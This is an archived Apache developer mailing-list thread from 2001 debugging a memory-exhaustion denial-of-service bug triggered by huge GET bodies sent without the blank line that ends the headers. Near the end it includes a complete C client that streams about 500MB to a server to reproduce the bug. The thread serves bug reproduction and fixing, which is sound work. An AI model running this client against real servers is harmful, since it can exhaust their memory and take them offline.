Re: More DoS -- Large GETs

2001-10-31 Thread Aaron Bannert

On Tue, Oct 30, 2001 at 05:55:42PM -0800, Aaron Bannert wrote:
> > Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> > times.  It was the httpd process which was growing, not my test program.
> > This was with Apache 2.0 HEAD, BTW, and 100% reproducible for me.
> 
> I am unable to reproduce this with valid HTTP request syntax and
> arbitrarily large bodies (at least against /index.html.en). The server's
> memory grows, but only up to an apparent limit.
> 
> However, if I omit the extra CRLF at the end of the headers (effectively
> fusing this humongous body with the headers) I _DO_ see a massive
> memory leak.

I just committed a fix for the leak that I was seeing. Are you still seeing
the other leak with this change?

-aaron
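
For clarity, the malformed request in question differs from a well-formed
one only by the blank line that ends the header block (a schematic; the
target and length are placeholders):

    Well-formed -- the body is drained 8K at a time and discarded:

        GET / HTTP/1.0\r\n
        Content-Length: 500000000\r\n
        \r\n                <- blank line terminates the headers
        xxxxxxxxxxxxxxxx...

    Malformed -- the blank line is omitted, so the x's continue an
    unterminated "header" line that the input filter keeps buffering:

        GET / HTTP/1.0\r\n
        Content-Length: 500000000\r\n
        xxxxxxxxxxxxxxxx...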



Re: More DoS -- Large GETs

2001-10-31 Thread Jon Travis

OK, I've tracked it a bit further.  This may be one of those 'Doctor, it
hurts when I do this' types of things, but I was using an old 2.0 config
file that I had, and that was causing this.

Anyway, I gradually picked off lines from my config file vs. the distributed
one, and it looks like if you comment out the following 2 lines:

AddHandler type-map var
DirectoryIndex index.html index.html.var

Within the <Directory> section for the htdocs, then the memory will go
through the roof with the method I described.

-- Jon
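
For context, those two directives sit in the stock config roughly like
this (a reconstruction from Jon's description, not his actual httpd.conf;
the path is a placeholder):

    <Directory "/usr/local/apache2/htdocs">
        ...
        AddHandler type-map var
        DirectoryIndex index.html index.html.var
    </Directory>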

On Wed, Oct 31, 2001 at 10:12:47AM -0500, Greg Ames wrote:
> Jon Travis wrote:
> 
> > Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> > times.  It was the httpd process which was growing, not my test program.
> > This was with Apache 2.0 HEAD, BTW, and 100% reproducible for me.
> 
> I think you have my fix to modules/http/http_request.c, right?  If not,
> ap_get_client_block can wreak havoc when a request body exists and we do
> an internal redirect, such as when the GET is to a directory.
> 
> Also, do you send an empty line before the 'x's, or could this be the
> problem Aaron noticed?
> 
> Greg



Re: More DoS -- Large GETs

2001-10-31 Thread Jon Travis

On Wed, Oct 31, 2001 at 10:43:12AM -0600, William A. Rowe, Jr. wrote:
> From: "Jon Travis" <[EMAIL PROTECTED]>
> Sent: Wednesday, October 31, 2001 10:18 AM
> 
> 
> > I'm checking my httpd.conf file to see if there is something weird
> > there.  I am indeed sending a valid GET with a huge Content-Length.
> 
> To which handler, may we ask?  That might make a difference, though it
> should not.

Just to '/'.

-- Jon




Re: More DoS -- Large GETs

2001-10-31 Thread William A. Rowe, Jr.

From: "Jon Travis" <[EMAIL PROTECTED]>
Sent: Wednesday, October 31, 2001 10:18 AM


> I'm checking my httpd.conf file to see if there is something weird
there.  I am indeed sending a valid GET with a huge Content-Length.

To which handler, may we ask?  That might make a difference, though it
should not.




Re: More DoS -- Large GETs

2001-10-31 Thread Jon Travis

I'm checking my httpd.conf file to see if there is something weird
there.  I am indeed sending a valid GET with a huge Content-Length.

-- Jon



On Tue, Oct 30, 2001 at 08:15:44PM -0500, Cliff Woolley wrote:
> On Tue, 30 Oct 2001, Cliff Woolley wrote:
> 
> > Oh... I think I see the problem.  In your test, you actually did a
> > real HTTP request and then had a really big request body.
> ...
> > Is that right, Jon?
> 
> I just reread the original message and I see that's not what Jon was
> doing.  But still, what happens if you do this?  I'll have to go try
> that...
> 
> --Cliff
> 
> --
>Cliff Woolley
>[EMAIL PROTECTED]
>Charlottesville, VA
> 
> 



Re: More DoS -- Large GETs

2001-10-31 Thread Greg Ames

Jon Travis wrote:

> Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> times.  It was the httpd process which was growing, not my test program.
> This was with Apache 2.0 HEAD, BTW, and 100% reproducible for me.

I think you have my fix to modules/http/http_request.c, right?  If not,
ap_get_client_block can wreak havoc when a request body exists and we do
an internal redirect, such as when the GET is to a directory.

Also, do you send an empty line before the 'x's, or could this be the
problem Aaron noticed?

Greg



Re: More DoS -- Large GETs

2001-10-31 Thread Greg Ames

Aaron Bannert wrote:

> However, if I omit the extra CRLF at the end of the headers (effectively
> fusing this humongous body with the headers) I _DO_ see a massive
> memory leak.

This sucks/needs to be fixed.  We used to have a limit on the length of
a header line, maybe 8K.  What happened to it?  (never mind, I'll go
look)

Greg
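
The limit Greg is remembering is presumably the one governed by the
LimitRequestLine and LimitRequestFieldSize directives, which default to
8190 bytes; if memory grows without bound on an unterminated header line,
the input filter is evidently buffering the "line" without that cap ever
being applied.  The defaults look like:

    # defaults: each request line / header field is capped at ~8K
    LimitRequestLine 8190
    LimitRequestFieldSize 8190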



Re: More DoS -- Large GETs

2001-10-30 Thread Aaron Bannert

On Tue, Oct 30, 2001 at 03:48:48PM -0800, Jon Travis wrote:
> On Tue, Oct 30, 2001 at 03:46:14PM -0500, Jeff Trawick wrote:
> > Jon Travis <[EMAIL PROTECTED]> writes:
> > 
> > > It's possible to make Apache eat up all available memory on a system
> > > by sending a GET with a large Content-Length (like several hundred MB),
> > > and then sending that content.  This is as of HEAD about 5 minutes ago.
> > 
> > Maybe the problem is your client implementation?  You didn't by any
> > chance get a mongo buffer to hold the request body, did you?
> > 
> > I just sent a GET w/ a 500,000,000-byte body and didn't suffer.
> > 
> > strace showed that the server process was pulling in 8K at a time...  lots
> > of CPU between client and server but no swap fest.
> 
> Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> times.  It was the httpd process which was growing, not my test program.
> This was with Apache 2.0 HEAD, BTW, and 100% reproducible for me.

I am unable to reproduce this with valid HTTP request syntax and
arbitrarily large bodies (at least against /index.html.en). The server's
memory grows, but only up to an apparent limit.

However, if I omit the extra CRLF at the end of the headers (effectively
fusing this humongous body with the headers) I _DO_ see a massive
memory leak.

Email me privately if you'd like the test client program I whipped together.

-aaron
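
A client along these lines can be whipped together in a few dozen lines
of C (a hypothetical sketch, not Aaron's actual program; the host, port,
and sizes are placeholders):

    /*
     * Hypothetical test client in the spirit of the one Aaron mentions
     * (this is NOT his program).  It sends a GET whose headers are never
     * terminated by a blank line, then streams a few hundred MB of 'x's.
     */
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <sys/socket.h>

    int main(void)
    {
        static char chunk[1024 * 1024];     /* 1MB of 'x's per write */
        /* Note: the blank "\r\n" line that would end the headers
         * is deliberately omitted here. */
        const char *req = "GET / HTTP/1.0\r\n"
                          "Content-Length: 500000000\r\n";
        struct sockaddr_in sa;
        int i, fd = socket(AF_INET, SOCK_STREAM, 0);

        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(80);
        sa.sin_addr.s_addr = inet_addr("127.0.0.1");
        if (fd < 0 || connect(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
            perror("connect");
            return 1;
        }
        memset(chunk, 'x', sizeof(chunk));
        write(fd, req, strlen(req));
        for (i = 0; i < 500; i++)           /* ~500MB total */
            write(fd, chunk, sizeof(chunk));
        close(fd);
        return 0;
    }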




Re: More DoS -- Large GETs

2001-10-30 Thread Cliff Woolley

On 30 Oct 2001, Jeff Trawick wrote:

> Jon Travis <[EMAIL PROTECTED]> writes:
>
> > Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
> > times.  It was the httpd process which was growing, not my test program.
> > This was with Apache 2.0 HEAD, BTW, and 100% reproducible for me.
>
> Hmmm... do you have any extra input filters configured?
>
> I don't know what would be different between our tests...  More
> information about mine:
>
> default_handler() was used to generate the response
>
> it calls ap_discard_request_body() which calls
> ap_get_client_block(,,8K) in a loop
>
> no input filters beyond those added automatically to implement HTTP

Oh... I think I see the problem.  In your test, you actually did a
real HTTP request and then had a really big request body.  In Jon's test,
it sounds like he did NOT make a real HTTP request, but instead just sent
millions of x's with no intervening newlines.  So one of the input filters
would just keep reading and reading, waiting for that first line to end so
it could see whether it's a valid HTTP request or not.

Is that right, Jon?

--Cliff


--
   Cliff Woolley
   [EMAIL PROTECTED]
   Charlottesville, VA
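
For reference, the 8K-at-a-time discard Jeff describes follows the
standard client-block pattern (a minimal sketch of the shape of the loop,
not the actual ap_discard_request_body()/default_handler() source):

    #include "httpd.h"
    #include "http_protocol.h"

    static int drain_request_body(request_rec *r)
    {
        char buf[8192];         /* httpd pulls in roughly 8K at a time */
        long nread;
        int rv;

        if ((rv = ap_setup_client_block(r, REQUEST_CHUNKED_DECHUNK)) != OK)
            return rv;

        if (ap_should_client_block(r)) {
            while ((nread = ap_get_client_block(r, buf, sizeof(buf))) > 0)
                continue;       /* throw the bytes away; memory stays flat */
            if (nread < 0)
                return HTTP_BAD_REQUEST;
        }
        return OK;
    }

With a well-formed request this loop keeps memory use flat no matter how
large the body is, which matches what Jeff saw under strace.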





Re: More DoS -- Large GETs

2001-10-30 Thread Jon Travis

On Tue, Oct 30, 2001 at 03:46:14PM -0500, Jeff Trawick wrote:
> Jon Travis <[EMAIL PROTECTED]> writes:
> 
> > It's possible to make Apache eat up all available memory on a system
> > by sending a GET with a large Content-Length (like several hundred MB),
> > and then sending that content.  This is as of HEAD about 5 minutes ago.
> 
> Maybe the problem is your client implementation?  You didn't by any
> chance get a mongo buffer to hold the request body did you?
> 
> I just sent a GET w/ a 500,000,000-byte body and didn't suffer.
> 
> strace showed that the server process was pulling in 8K at a time...  lots
> of CPU between client and server but no swap fest.

Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
times.  It was the httpd process which was growing, not my test program.
This was with Apache 2.0 HEAD, BTW, and 100% reproducible for me.

-- Jon